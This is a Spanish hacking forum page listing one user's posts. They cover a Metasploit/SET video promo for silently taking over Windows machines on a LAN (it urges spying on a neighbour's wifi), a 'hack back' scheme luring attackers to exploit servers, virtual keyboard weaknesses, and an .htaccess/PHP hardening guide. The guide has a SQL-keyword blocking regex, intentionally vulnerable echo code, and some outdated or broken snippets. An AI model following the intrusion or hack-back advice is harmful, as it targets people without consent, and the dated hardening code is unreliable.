Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - REC

Páginas: [1] 2
1
Seguridad Wireless / Fortinet hacking hostpot
« en: Junio 25, 2013, 12:41:18 am »
HOSTPOT.
Hola , Nose cuantos de ustedes se abran cruzado con este tipo de autentificacion ( medida de seguridad)
yo me eh cruzado con muchas de estas , en el aeropuerto ,  internado , etc etc  aquí enseño como evadir ..  Disfruten!


FUENTE: http://rec-labs.blogspot.com/2013/06/fortined-hacking-hostpot.html

2
CAINE – Distribución LINUX para Análisis Forense

CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a project of Digital Forensics
Currently the project manager is Nanni Bassetti.
CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface.
The main design objectives that CAINE aims to guarantee are the following:

an interoperable environment that supports the digital investigator during the four phases of the digital investigation
a user friendly graphical interface
a semi-automated compilation of the final report
We recommend you to read the page on the CAINE policies carefully.
CAINE represents fully the spirit of the Open Source philosophy, because the project is completely open, everyone could take the legacy of the previous developer or project manager. The distro is open source, the Windows side (Wintaylor) is open source and, the last but not the least, the distro is installable, so giving the opportunity to rebuild it in a new brand version, so giving a long life to this project ....

Nanni Bassetti



CHANGELOG CAINE 3.0 "Quasar"

Kernel 3.2.0-31

ADDED:
MATE 1.4 + LightDM
iphonebackupanalyzer
exiftool phil harvey
tcpflow
tshark
john
wireshark
firefox
vinetto
mdbtool
gdisk
LVM2
tcpdump
Mobius
QuickHash
SQLiteBrowser
FRED
docanalyzer
nerohistanalyzer
knowmetanalyzer
PEFrame
grokEVT
zenmap (nmap)
blackberry tools
IDevice tools

=============================================================================

Descargar : http://www.caine-live.net/Downloads/caine3.0.iso

Fuente :  http://www.caine-live.net

3
Hacking / Metasploit & SET , Hacking Windows en una red-LAN
« en: Enero 10, 2013, 10:28:27 am »
                                                                 Hacking windows con SET y metasploit


Hola, el siguiente vídeo pues  se da en explotar una vulnerabilidad de la maquina victima , en el escenario de una red-LAN sin que la victima sospeche ya que ella solo coloca en su navegador "facebook.com",talbes no te as
preguntado oh se te a ocurrido que puedes hacer cuando estas conectado en una universidad,
centro públicos, donde brinden el servicio de wifi totalmente gratuito, oh bien quieres saber
que es lo que hace tu vecina y ves que te llega señal de su wifi y no sabes la contraseña, y pues
quieres entrar ah su red para enterarte de lo que esta haciendo como sea, descifras la wifi y enjoy!
ya estoy adentro de la dicha red wifi , y ahora ¿que hago ? ¿cual es mi siguiente paso?
¿como me entero de que es lo que hace ?
en este vídeo enseño del terror que podemos hacer y el como lograr una sesión METERPRETER
ala maquina VICTIMA que esta conectado a tu misma red, "Sin que se de cuenta".





Fuente :  http://rec-labs.blogspot.com

4
Como desinstalar Ubuntu y dejar Windows

Cada vez hay más personas que instalan Linux (generalmente Ubuntu o una de sus variantes) para probarlo. Sin embargo, después de un tiempo quieren desinstalarlo, ya sea porque no les gusta, porque necesitan el espacio de disco duro que ocupa, cuestiones laborales, etc.

Aunque mi opinión es que si se sigue usando Linux como un sistema operativo regular se puede hacer todo lo que se hace en Windows (eso sí, con otros programas), muchos no quieren o no pueden intentarlo, por lo que deciden desinstalarlo.

Nota: Aunque este tutorial va dirigido a Ubuntu o sus variantes (Kubuntu, Xubuntu, etc.), el principio es aplicable a la mayoría de las distribuciones Linux

Antes de hacer nada debemos tener en cuenta algunos factores:
1: Hay que respaldar toda la información que tengamos en la partición de Linux, ya que al desinstalarlo, desaparecerán todos esos datos.
2: Al manipular particiones SIEMPRE existe el riesgo de perder datos en TODAS las particiones, por lo que es recomendable respaldar también la información importante de la partición de Windows.

Entremos en materia.
Para desinstalar Ubuntu existen 3 métodos, dependiendo de cómo fue instalado el sistema.
1: Si sólo está instalado Linux
2: Si se instaló por medio de Wubi
3: Si se instaló desde el instalador del CD.

Caso 1: Si sólo está instalado Linux:
Simplemente de mete el CD de Windows, se eliminan las particiones y se crean nuevamente durante la instalación, y así quedará instalado solo Windows.

Caso 2: Si se instaló por medio de Wubi
Wubi es un programa que permite instalar Ubuntu desde Windows, por lo que para desinstalarlo se hace normalmente. Es decir se desinstala como desinstalaríamos cualquier otro programa

Caso 3: Si se instaló en una partición aparte desde el CD de Ubuntu
Esto sí es un poco más complicado, ya que requiere algunas herramientas adicionales. Así que nos centraremos en esta última opción.

Paso 1: Respaldar información de las particiones.
No voy a entrar en detalles, ya que cada quién tiene su forma de hacerlo. Puede ser grabar los archivos en un Cd o DVD, en una memoria USB, un disco duro externo, etc.

Paso 2: Desinstalar el GRUB
El GRUB es el gestor de arranque que aparece al inicio del sistema para seleccionar el sistema operativo que vamos a usar.




Para desinstalarlo, hay muchas formas, la más sencilla es usar el SUPER GRUB DISK
Es un programa (formato ISO) para grabar en un CD. Aunque su función principal es reparar el GRUB cuando éste falla, también puede desinstalarlo.

Para hacer esto, descargamos el ISO desde su página oficial

La mayoría (si no es que todos) los programas de grabación de CD/DVD tiene la opción de grabar imágenes de disco en formato ISO, así que no entraremos en detalles.
Una vez grabado el CD, lo insertamos en el lector y reiniciamos el sistema. Debemos asegurarnos que el sistema pueda arrancar desde el lector o grabador, aunque si tenemos instalado Linux es casi seguro que sí lo hace, ya que es de esta forma como se instala. Si no arranca desde el CD-ROM que acabamos de grabar, necesitamos entrar al BIOS y configurarlo de tal manera que arranque desde el CD.


Nota importante:
El BIOS es un programa muy delicado, que puede dejar inservible el sistema. Si no sabemos qué estamos moviendo, no hay que mover nada.

Una vez que inicia desde el CD, nos aparecerá brevemente esta pantalla:


E inmediatamente pasará al menú principal del Super Grub Disk
Elegiremos la opción que aparece resaltada en ésta captura, es decir, WIN => MBR & !WIN!




Con esto desinstalará el GRUB e iniciará automáticamente en Windows.

Para comprobarlo, sacamos el CD y reiniciamos el sistema y veremos que ya no aparece el GRUB y entra directamente en Windows.

Paso 3: Eliminar las particiones de Linux:
Ahora ya es seguro eliminar las particiones de Linux y las volvemos a crear para que sean reconocidas por Windows.
Esto se puede hacer desde el administrador de discos. Para llegar allí, le damos con el botón derecho del mouse al ícono llamado Equipo (Mi PC en Windows XP) y vamos a Administrar-administrador de discos (En ambas versiones de Windows es prácticamente lo mismo)



Aquí podremos eliminar las unidades lógicas y particiones utilizadas en Linux para que podamos usarlas desde Windows.



Una vez que eliminemos las particiones de Linux, hay que crear una nueva, pero que sea reconocible desde Windows.



El mismo asistente que crea la nueva partición, da la opción de formatearla, así que cuando finalice, podremos ver 2 discos duros en nuestra PC, aunque en realidad, sólo son 2 particiones.




Nota importante: No recomiendo redimensionar las particiones para que quede como una sola, ya que esto conlleva muchos riesgos y se pueden perder todos los datos, incluyendo los de Windows.

 


Fuente

5
Seguridad / Estrategias de Contra-Ataque
« en: Junio 10, 2012, 11:35:21 pm »
Estrategias de Contra-Ataque by Socket_0x03

Ante todo un cordial saludo a los internautas de esta comunidad, a la hora de implementar la seguridad en nuestros servidores HTTP, podemos programar varias aplicaciones para contra-atacar a aquellos informáticos que intentan vulnerar nuestros sistemas; en otras palabras, diseñar programas que nos permitan tomar el control total de aquellos equipos que intentan vulnerar nuestros servidores, de esta forma, los atacantes pasarían a ser las víctimas y nuestros servidores terminarían con una mayor seguridad. Para esto existen diferentes tipos de estrategias y las más básicas pueden ser las siguientes:

Estrategia 1: Si nuestro website contiene un panel administrativo con un sistema de login, se pueden incluir diferentes tipos de passwords y accesos, de forma que uno seria para entrar al panel administrativo y otro para convertir a los atacantes en víctimas; por ejemplo, si el atacante esta utilizando ataques de fuerza bruta o diccionario, se puede incluir un password corto con palabras simples y uno largo con palabras complejas, de esta forma el atacante daría con el password corto el cual no seria para entrar al panel administrativo, sino que seria redirigido a una parte del servidor en donde su computadora seria vulnerada.

Estrategia 2: Esta es la estrategia que se aplica en el video que se encuentra más adelante. Si no utilizamos sistemas de login ya que por cuestiones de seguridad preferimos realizar las modificaciones directamente desde la computadora que esta como servidor HTTP, se puede añadir un sistema de login falso con varias vulnerabilidades (course code disclosure, inyecciones SQL... etc.) que permitan a un atacante averiguar el nombre de usuario y password de ese login, si por ejemplo se colocan varios datos en ese login no pasa nada, pero si se coloca el nombre de usuario y password correcto, el atacante puede ser redirigido a una parte del servidor en donde su sistema sea vulnerado.

Estrategia 3: Si un atacante esta intentado infiltrarse en nuestros sistemas mediante alguno de los puertos para de esta forma realizar modificaciones en nuestros servidores HTTP, se puede utilizar un firewall que filtre todos los puertos pero deje uno a la escucha, este puerto que queda a la escucha o abierto puede ser utilizado para explotar vulnerabilidades en los sistemas que intenten conectar con el. Un ejemplo para que todo cuadre correctamente seria de la siguiente forma: supongamos que el atacante utiliza el Nmap para escanear los puertos y servicios de nuestra computadora, nuestra computadora le va a informar que tiene el servidor VNC corriendo en el puerto 5900 (en realidad es un exploit y no el servidor del VNC), cuando el atacante intente conectar al puerto 5900 mediante el cliente del VNC, a este se le explota una vulnerabilidad de desbordamiento de memoria en su cliente del VNC y ya con esto nosotros tomamos todo el control de su computadora o configuramos adecuadamente la shellcode del exploit para que se produzca el efecto que nosotros deseemos en su computadora. Este tipo de estrategia más que todo se aplica en las herramientas de administración remota como el VNC-Viewer que funcionan mediante cliente y servidor.

Tipos de Vulnerabilidades: Alguna de las vulnerabilidades que puede utilizar el administrador de un servidor HTTP para convertir a los atacantes en víctimas son las siguientes:
-Desbordamientos de memoria
-Corrupción de la Memoria Double-free
-Explotación de Punteros Colgados

Aplicaciones Vulnerables: El administrador de un servidor HTTP puede explotar las vulnerabilidades que se mencionaron anteriormente en las siguientes aplicaciones:
-Navegadores como internet explorer, firefox, opera y otros.
-Reproductores de música o Videos
-Archivos relacionados con imágenes
-Archivos para leer información como PDF

Punto a tener en cuenta: un dato importante a tener en cuenta es que se deben programar aplicaciones que detecten algunas configuraciones o aplicaciones de la computadora del atacante para luego redirigirlo al puerto adecuado en donde se explotara el fallo; por ejemplo, si la computadora del atacante utiliza internet explorer, esta puede ser redirigida al puerto 3333, si la computadora del atacante utiliza firefox, esta puede ser redirigida al puerto 3332... De esta forma el administrador que implementa la seguridad en su servidor HTTP puede dejar más de 20 puertos a la escucha y algunos de estos pueden ser utilizados o no de acuerdo a la computadora del atacante.

Información sobre el video: En este video tutorial no se van a vulnerar computadoras ajenas y todo se desarrolla en una intranet, para esto utilizo tres de mis computadoras:
La computadora principal: Una computadora que tiene el control de las otras dos computadoras mediante VNC-Viewer, esta se utiliza para mostrar los procedimientos que se realizan en las otras dos computadoras.

La computadora XP: Una computadora de nombre XP que tiene como IP 192.168.1.100, en esta se encuentra instalado un servidor HTTP y se aplican las estrategias que podría realizar un administrador que implementa la seguridad en sus servidores y websites. En este sistema se encuentra un sistema de login con una vulnerabilidad de course code disclosure, si se introduce cualquier dato no pasara nada, pero si se introduce el nombre de usuario y password correcto, la persona sera redirigida a una parte del servidor en donde se explota una vulnerabilidad y el administrador del servidor HTTP tomara todo el control de esa computadora. Para la explotación de la vulnerabilidad se utiliza Metasploit el cual se configura adecuadamente para explotar un fallo en el internet explorer del atacante.

La computadora BUG: Una computadora de nombre BUG que tiene como IP 192.168.1.103, en esta se aplican los procedimientos que podría utilizar un atacante a la hora de vulnerar un servidor HTTP o un website. Primero, se utiliza el escaneador de vulnerabilidades Acunetix el cual muestra una vulnerabilidad de source code disclosure. Segundo, se utiliza un exploit para explotar el fallo de source code disclosure y obtener el nombre de usuario y passwrod de un sistema de login. Tercero, se introduce el nombre de usuario y password en el sistema de login. Finalmente, en lugar de encontrar el panel administrativo del servidor HTTP, este es redirigido a una parte del servidor en donde se explota una vulnerabilidad en su computadora.


DESCARGAR AQUI EL VIDEO TUTORIAL

6
MAC OSX / Visualizar archivos ocultos en Mac OS X
« en: Junio 10, 2012, 10:46:48 pm »
Visualizar archivos ocultos en Mac OS X


Esto es algo que a menudo me han preguntado y aunque parezca simple, es probable que les haya dado un buen tiempo de búsqueda a muchos.

Abran la terminal (Muchas veces clientes como iTerm no funcionan correctamente) e ingresen lo siguiente

Citar
defaults write com.apple.finder AppleShowAllFiles TRUE

Para revertir el cambio simplemente ingresan:

Citar
defaults write com.apple.finder AppleShowAllFiles FALSE

Espero que les haya servido. Saludos.

PD: Ideal para desarrolladores que tengan que lidiar con archivos que inicien su nombre por un punto (.) como .htaccess y demás, que por defecto son ocultados.


7
Bugs y Exploits / Intrusión en Winbug con Backtrack
« en: Junio 10, 2012, 10:38:42 pm »
Intrusión en Winbug con Backtrack

By Intruder-T23

8
Preguntas frecuentes sobre seguridad en aplicaciones Web (OWASP FAQ)

Hola amigos como Dice el titulo este curso trata sobre todas las  preguntas mas  frecuentes sobre seguridad en aplicaciones web,
si vas a iniciar una pagina web es fundamental el leer esta serie de preguntas.

:------------------------------------------:
Autor: Sangita Pakala
Traducción: Alberto Pena Leiras
Edición: Juan Carlos Calderón Rojas

::-------------------------------------------::


9
Seguridad / La seguridad de los Teclados virtuales
« en: Mayo 30, 2012, 08:01:29 pm »
La seguridad de los Teclados virtuales

Cada vez se hace mas evidente que la mayoría las páginas web, no tienen en cuenta la importancia de la protección de los datos, paginas con contenido confidenciales, como por ejemplo, los bancos, o webs de e-commerce, son objetivos de los atacantes o de la causa “hacktivista” del momento, solo veamos los siguientes escenario para hacernos una idea de lo que piensan los roles involucrados.


Tres escenarios posibles, tenemos que considerar:

Del lado del usuario, nos conectamos a un banco o a una web de compras, ¿acaso podemos tener por lo menos una “pequeña tranquilidad” viendo el “candadito”?
Del lado del proveedor de ese servicio, disponemos del último antivirus, parche y cumplimos con la ISO 1.000.001 ¿damos por asentado que los usuarios estarán seguros?
Mientas Del lado del atacante, están contentos porque instalaron el ultimo keylogger, indetectable, y encima pueden saber si el usuario sale con la secretaria que trabaja en el proveedor
Posiblemente tu estés en alguno de esos roles y has pensado algo muy parecido a los escenarios planteados, te cuento que de cada 10 sitios webs que visito, y en el cual estén trabajando tanto con “HTTPS” como con teclados virtuales, noto que 7 de ellos tienen fallas que un atacante no perdonaría.

Hablemos de los teclados virtuales:


Un teclado virtual es una aplicación por lo general escrita en JavaScript que nos muestra una pagina web, y en el cual, mediante clics del mouse, podremos mandar nuestro o “clave”, sin utilizar el teclado y así poder tener acceso al servicio ofrecido.

Encontramos también, teclados que no obedecen ningún orden de aparición de teclas, esto significa que no están ordenadas como los teclados originales, y también tenemos teclados virtuales de números solos, o hasta gráficos (este es muy bueno, recomendable usarlo!!!)

De antemano, sabemos que es IMPORTANTE, no acceder a sitios que contengan teclados virtuales (por tanto con información sensible) desde lugares públicos, (llámese ciber, aeropuerto, hoteles, etc), dado que es más sencillo un ataque desde ahí.

Pero no siempre la seguridad de estos teclados es la mejor, algunos llegan al punto de guardar en “campos ocultos” los datos digitados sin cifrar, para luego ser enviados en métodos GET o POST, otros guardan una cookie en texto plano con esta información, sin contar con los que guardan toda la información digitada en la cache del navegador.

Existen métodos como la suplantación del teclado en la cache del navegador, que permiten a un atacante, sin modificar la pagina de la entidad bancaria o el sitio que contenga el teclado virtual, reemplazarlo con otro que además de enviar la información al sitio donde debería ir, también envía una copia de la misma a ellos y para esto solo es necesario que el usuario visite un sitio malicioso, para después acceder a la pagina legitima de la entidad.

Los atacantes casi siempre están un paso adelante, keyloggers indetectables, troyanos que graban videos, y aplicaciones que utilizamos para manejo de proxys, las cuales son de utilidad en el traslado de los paquetes hacia el destino, no se habla de un esnifeo, sino que se habla de la traslación de esos paquetes, que NO ESTAN CIFRADOS en el momento que los utilizamos en NUESTRO ORDENADOR.

La clave ingresada, sea pulsada o por teclado virtual, no está cifrada en su mayoría (al menos de cada 10 bancos que testee, 2 estaban cifrados), y pude capturar lo ingresado por teclado virtual, en TEXTO PLANO!!!!, en otros bancos, capture el hash que realizo el teclado virtual, pero no hay como un buen traductor (HASHONLINE).

CONCLUSION Y RECOMENDACIONES

De lado del cliente:

Utilizar software para la administración de contraseñas como LastPass.com o similares
Realizar nuestras transacciones desde equipos seguros y ojala siempre desde el mismo.
Utilizar diferentes claves SEGURAS para cada sitio (ayuda mucho usar software de administración de contraseñas)
Del lado del sitio web:

CIFRA TODO, cada etapa del camino que recorre la información debe ser cifrada
Si vas a almacenar la información temporalmente en alguna parte, asegúrate que esta este cifrada y que sea borrada cuando no se necesite
Utiliza un teclado que cambie cada la posición de las teclas cada vez que el usuario entre y ojala que maneje símbolos que acordaran utilizar mutuamente con anterioridad.
No te quedes con el “OK, tengo todo controlado”, piensa mejor ¿¿tengo todo controlado??
Como conclusion, no nos podemos confiar del canadito y el teclado virtual pensando que son medidas altamente seguras y que nuestra informacion estará segura con ellas, como vimos anterioremente existen muchas formas de atacar estas medidas

Fuente : http://www.dragonjar.org/la-seguridad-de-los-teclados-virtuales.xhtml

10
Hola amigos de Underc0de les traigo este tutorial,espeor que resuelva sus dudas, espero que le saquen provecho y como siempre , "Diviertanse"

Y compartan informacion en este mundo entretenido que es la  seccion de seguridad , salu2


[-]- - - - - - - - - - - - - - - - - - [-]

Security website - By: Painboy

[1] Introduccion

[2] ¿Como nos atacan?

[3] Htaccess & Php.ini

[3.1] ¿Para que sirven?

[3.2] Htaccess

[3.2.1] Introduccion Htaccess

[3.2.2] Codigos utiles de Htaccess

[3.3] Php.ini

[4] Evitar ataques

[4.1] XSS

[4.2] Sql injection

[4.3] Rfi

[4.4] Lfi

[4.5] dos

[5] Despedida

[-] - - - - - - - - - - - - - - - - - - [-]

[1] Introduccion:

Buenas creo esto manual porque veo demasiados servidores webs sin la seguridad necesaria.

Pues este manual se para mejorar o intentar mejorar la seguridad web en la red.

Tratare de explicar lo mejor posible los pasos que daremos.

[-] - - - - - - - - - - - - - - - - - - [-]

[2] ¿Como nos atacan?:

Como nos atacan un apartado muy importante bueno hay varios,muchas formas de ataque

Algunas podremos evitar otras no.

Daremos aqui algunos ejemplos de conque cosas suelen atacar nuestro website:

-XSS (Cross site scripting)
-Sql injection
-Blind Sql injection (Injeccion a ciegas)
-dos (Ataques SYN respuestas)
-Reverse ip

y muchas mas que hay pero esto es lo que en este manual intentaremos evitar que se produzca.

Pero recuerda algo para poder evitar la mayoria de esto deberas aprender a programar o a leer

el manual detenidamente y aprenderlo.


[-] - - - - - - - - - - - - - - - - - - [-]

[3.1] Para que sirven (Htaccess y Php.ini):

Estos 2 archivos muy apreciados por los webmaster vienen a configurar el servidor web con multitud

de funciones.Estos 2 archivos son muy utiles para la seguridad de nuestro website


[3.2] Htaccess:

Es un archivo de configuracion de el servidor web se le da ordenes para realizarse como restricciones

y demas. ahora nos adentraremos un poquito mas en htaccess.


[3.2.1] Intruduccion a Htaccess:

htaccess como eh dicho anteriormente es un archivo de texto que apache usa para dar ordenes

al servidor y trabajarlas. para crear el archivo .htaccess has lo siguiente:


[1]: Habre el Bloc de notas
[2]: Pincha en > Archivo > Guardar como
[3]: Pon de nombre " .htaccess "
[4]: Selecciona en tipo "Todos los archivos"
[5]: Aceptar o Guardar

Perfecto tendras creado el archivo .htaccess pero todavia no esta subido asi que simplemente subelo

a tu hosting ponlo en la carpeta que desees que trabaje (Por ahora no hay nada no hay codigos)

y perfecto tendras ya subido el archivo .Htaccess para que trabaje cuando le metas codigos.



[3.2.2] Codigos utiles de Htaccess:

Buenas aqui te enseñare algunos codigos muy utiles para evitar tonterias de los lammers o algunos

que quieren joder tu web o simplemente para mejorar tu website.

Permitir acceso desde una IP unica

Buenas pues al lugar donde se hubica el sitio donde subiste el .htaccess con el siguiente codigo

Solo se le permitira la entrada si accede desde una ip (la que desees) para eso en nuestro archivo

.htaccess lo colocamos:


Código:
Citar
deny from all
allow from (Direccion IP)
 
Personalizar extensiones .html,.php y demas!

Alguna vez has querido por ejemplo crear un archivo index.shit y que se lo tome como si fuese

un archivo php pero que la extension sea .shit bueno pues hay un codigo en htacess para modificar

las extensiones lo explicamos este es el codigo:


Código:
Citar
AddType application/x-httpd-php .extension
 
lo que haria ese codigo seria tratar los archivos con la extension ".extension" como si fuesen .php !

Ahora probemos haber si podemos tratar un archivo de extension ".painboy" como si fuese .html:

Código:
Citar
AddType application/x-httpd-html .painboy
 
y seria tratado como archivo html pero con la extension .painboy!

Personalizar pagina error:

Te suena verdad el tipico error 404 este error se muestra cuando no se encuentra el archivo en el

Servidor y no lo puede localizar pues si te molesta este error simplemente debes añadirle unas

2 lineas a tu .htaccess:


Código:
Citar
RewriteEngine On
ErrorDocument 404: Paginaadondellevasisecometeerror
 
Ok de este codigo puedes modificar varias cosas.

1: Puedes cambiar el error a otro error ya que hay varios como el 505 y demas..

Si quieres evitar el error 505 simplemente has lo siguiente coloca lo siguiente en tu archivo

.htaccess


Código:
Citar
RewriteEngine On
ErrorDocument 505: archivoaredireccionarsisedaelerror505
Desabilitar el Acceso a una carpeta

Para desabilitar a la gente el acceso a una carpeta pues nada mas debes introducir el siguiente

Codigo en tu archivo .htaccess y luego subir el .htaccess dentro de la carpeta que deseas no permitir

acceder. el codigo es el siguiente:


Código:
Citar
#deny all access
deny from all
 
y con eso nadie podria acceder al contenido de archivos de esa carpeta.

Personalizar pagina error:

Te suena verdad el tipico error 404 este error se muestra cuando no se encuentra el archivo en el

Servidor y no lo puede localizar pues si te molesta este error simplemente debes añadirle unas

2 lineas a tu .htaccess:


Código:
Citar
RewriteEngine On
ErrorDocument 404: Paginaadondellevasisecometeerror
 
Ok de este codigo puedes modificar varias cosas.

1: Puedes cambiar el error a otro error ya que hay varios como el 505 y demas..

Si quieres evitar el error 505 simplemente has lo siguiente coloca lo siguiente en tu archivo

.htaccess


Código:
Citar
RewriteEngine On
ErrorDocument NºDELARCHIVOERROR: PGINAAREDIRECCIONSIOCURREESEERROR
Bueno pues ya saben evitar errores de este tipo.por ejemplo hagan lo siguiente:

Vallan a la siguiente url: www.mundonet.us/loquequierasyquenoexista.html

y veran que mostrara algo que dice error.html eso es porque ahi tendria que dar error 404 pero

Que ocurrio pues que tenia que redireccionar al archivo error.html pero el archivo error.html no lo

eh creado asi que no se redirecciona.

Evitar Hot link

Hot link es cuando por ejemplo publicamos una img , video en algun servidorweb que no es el nuestro

Pero ese archivo esta subido en nuestro hosting pues ahi gastaria nuestra banda de ancha seria como

Un robo de banda ancha! pues con el siguiente codigo evitaremos que nos roben la Banda Ancha:


Código:
 
Citar
1. RewriteCond %{HTTP_REFERER} !^$
 2. RewriteCond %{HTTP_REFERER} !^http://websitetuya.com$ [NC]
 3. RewriteCond %{HTTP_REFERER} !^http://websitetuya/.*$ [NC]
 4. RewriteCond %{HTTP_REFERER} !^http://websitetuya$ [NC]
 5. RewriteCond %{HTTP_REFERER} !^http://websitetuya/.*$ [NC]
 6. RewriteRule .*\.(fla|gif|jpg|jpeg|png|bmp)$ - [F,NC,L]
 
Aqui lo que debes hacer es modificar websitetuya por tu website y ya.

Asi con esto lograremos evitar que consuman nuestra banda ancha con este codigo evitamos

Que los archivos (Fla,gif,jpg,jpeg,png,bmp) sean mostrados en otros sitios que no sean nuestro

servidor web claro.

Evitar mostrar modulos de apache y version

Este codigo sirve para no mostrar ese error




Ya que ese error puede dar informacion importante si nos quieren atacar asi que lo evitaremos

Colocando el siguiente codigo en nuestro archivo .htaccess:


Código:
Citar
ServerSignature Off
 
Query_string

Es muy importante configurar bien esto asi evitaremos varias cosas como

Sql injections,XSS y demas.

Para configurar bien colocaremos el siguiente codigo en nuestro archivo .htaccess:

Código:
Citar
RewriteCond %{QUERY_STRING}  ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]
RewriteCond %{QUERY_STRING}  ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
RewriteCond %{QUERY_STRING}  ^.*\.[A-Za-z0-9].* [NC,OR]
RewriteCond %{QUERY_STRING}  ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC]
 
Evitar el Robo(Hurto) de cookies

Pues recuerdan que se podia robar cookies con una tecnica llamada xss pues eso se acabo

Con el siguiente codigo colocalo en tu .htaccess si quieres evitar que por culpa de una variable

mal programada te roben cookies a tu usuarios:


Código:
Citar
RewriteCond %{HTTP_COOKIE} PHPSESSID=([^;]+) [NC]
RewriteRule ^(.*)$ - [env=sessid:%1]
Header set Set-Cookie "PHPSESSID=%{sessid}e; path=/; HttpOnly" env=sessid
 
Evitando Rfi / Lfi

Buenas pues con el siguiente codigo evitaremos que por ejemplo con el siguiente codigo en php

voy poner una variable vulnerable a rfi:


Código:
Citar
<?php
echo $var;
?>
 
Ok lo explotariamos eso haci http://www.tuweb.com/comosellamaelar...r=loquequieras

y si muestra loquequieras significa que register_globals esta en on. pues para evitar esto pondremos

lo siguiente en nuestro archivo .htaccess

Código:
Citar
php_flag register_globals off
 
y con eso estariamos evitando incluir archivos,palabras y demas en cualquier variable de archivos php.

Protegiendo carpetas con contraseña

Bien para mi esto es muy importante si quieres privacidad en tus carpetas que te muestre un login

para meter el usuario y contraseña.

Bien pues añadiremos las siguientes lineas al archivo .htaccess:

Código:
Citar
AuthUserFile /rutacompleta/hacia/.htpasswd
AuthName AquiPuedesPonerLoQueQuieras
AuthType Basic

require user NOMBREUSUARIO
 
lo que hace eso seria buscar la ruta de el archivo .htpasswd luego mostrar "Entas entrando en

Aquipuedesponerloquequieras" luego definir que es un login basico el normal y luego

decir el unico usuario que puede acceder (Para añadir mas usuario require user nombre1 nombre2)

En el archivo .htpasswd la sintaxis es la siguiente:

NOMBREUSUARIO:CONTRASEÑA

Ejemplo:

painboy:4sxbu06GwVhd2


Bueno la contraseña que se da como puedes ver debe estar encriptada en una variacion del algoritmo

MD5 Realizada por el apache.

Bueno pues para crear el archivo htpasswd y que te de la contraseña ya encriptada y todo listo

para subir abre la consola MS-DOS y escribe lo siguiente:


Código:
Citar
htpasswd -cb .htpasswd USUARIO CONTRASEÑA
 
y te lo guardara en un archivo .htpasswd listo para subir al hosting y usarlo.

y con eso ya tendras tu login de proteccion de carpetas y siempre cuando intentes acceder a la

Carpeta donde se encuentra ese htaccess te pedire usuario y password y si los pones bien te da

Accesso.


[-] - - - - - - - - - - - - - - - - - - - - - - - - -[-]

[3.3] Php.ini:

Ultimamente el php se ah visto muy usado en servidores web es tan comun ver archivos php que

es necesario un archivo para configurar sus funciones y demas

a este archivo se le llama "php ini" a diferencia de el .htaccess el .htaccess engloba todo sobre

Configuracion del servidor web encambio el php ini solo trabaja sobre los archivos php


[3.3.2] Introduccion a Php.ini:

Php.ini es un archivo de configuracion de archivos php al cual se le puede desactivar,activar funciones

y demas asi que aprenderemos un poco a usarlas por ahora quiero que hagas los siguientes pasos

para crear el archivo Php.ini:

[1] Abres bloc de notas
[2] Pulsas >Archivo > Guardar como
[3] Pones de nombre "Php.ini"
[4] En tipo pones: "Todos los archivos" (vendra por defecto .txt !cambialo!)


y haci abras creado el archivo Php.ini bueno ahora subelo a tu hosting y ya tendras el archivo Php.ini

en tu servidor.

Ahora empezemos a ver instrucciones utiles de Php.ini.


[3.3.2] Codigos Utiles de Php ini

Ahora aprenderemos unos cuantos codigos utiles para nuestra configuracion de Php.ini

Espero que les sirva empezemos:

allow_url_fopen

Esta funcion lo que hace es permitir tratar incluir ficheros en la url osea tratar una url como un acceso

a un fichero esta funcion viene activada! y claramente no nos combiene ser victimas de un ataque

Asi que haremos lo siguiente ya que actualmente el php en nuestro servidor figura como lo siguiente:

allow_url_fopen = on lo que haremos sera en nuestro archivo Php.ini colocaremos el siguiente codigo

Código:
Citar
allow_url_fopen = off
 
y haci ya no se incluirian los archivos.

Evitar mostrar errores de Php

Para evitar mostrar errores de php y asi evitar que sea mas sencillo que venga uno y nos quiera hacer

pasar un mal rato es recomendable desactivar el mostrar errores de php asi que añadiremos

este siguiente codigo en el archivo Php.ini


Código:
Citar
display_errors = Off
display_startup_errors = Off
 
y ya esta eso es con eso ya no se mostrarian los errores de php.

Activando el Safe Mode

Como sabran es muy importante activar el modo seguro en nuestro servidor

Asi limitaremos y mucho a los malechores de la red que intentan modificar nuestros archivos

Asi que colocaremos el siguiente codigo en nuestro archivo Php.ini:

Código:
Citar
safe_mode = On
 
Citar
Register_globals

Como habia explicado mas arriba en la parte de "Codigos Utiles de htaccess" usaremos esta funcion

Para asi evitar inclusiones como de Rfi asi que por defecto esta desactivado asi que hay que

Mantenerlo asi pero por si no lo tienes coloca lo siguiente en el archivo Php.ini:


Código:
Citar
register_globals = off
 
[-] - - - - - - - - - - - - - - - - - - [-]

[4] Evitar Ataques:

Bien en este apartado nos centraremos un poquillo en la programacion sobre todo php y algunas

cosillas mas espero que les sea de ayuda y empezamos:


[4.1] Evitar XSS:

Bueno la verdad el tema de evitar ataques XSS Es un tema muy urgente en la red asi que lo

Trataremos asi que espero que no intentes leer esto si no eres programador o miniprogramador en

Php ya que sino no entenderas empezamos:

Bueno haber imaginemonos un libro de visitas no?

Ok que es lo que hace un libro de visitas sin filtros ni nada, Pues es un libro que muestra exactamente

lo que se escribio en el mensaje y los codigos <h1> y demas se injectan! y se ejecutan ok.

Bueno pues lo que queremos es que no se ejecuten verdad?

Pues perfecto explicare algunas funciones muy utiles para evitar esto:

strip_tags:

Bien lo que hace esta funcion es como su nombre indica "ARRANCAR" , "Romper" las tags (<>)

Bueno bien pues esta funcion eso es lo que realiza romper tags por lo tanto si la usamos

imaginate pongo algo asi:




Pues el atacante creera que su el codigo introducido en el comentario se va a ejecutar pero no!

ya que yo para que se muestre tengo que hacer lo siguiente:


Código:
Citar
<?php
$Proteccion = strip_tags($_REQUEST['Comentario'];
echo $Proteccion;
?>
 
Entonces si ponemos ese codigo solo se mostraria el comentario sin el tag de <h1> y haci evitamos

Que se muestre en grande lo que escribio el atacante. encambio si ponemos esto:


Código:
Citar
<?php
echo $_REQUEST['Comentario'];
?>
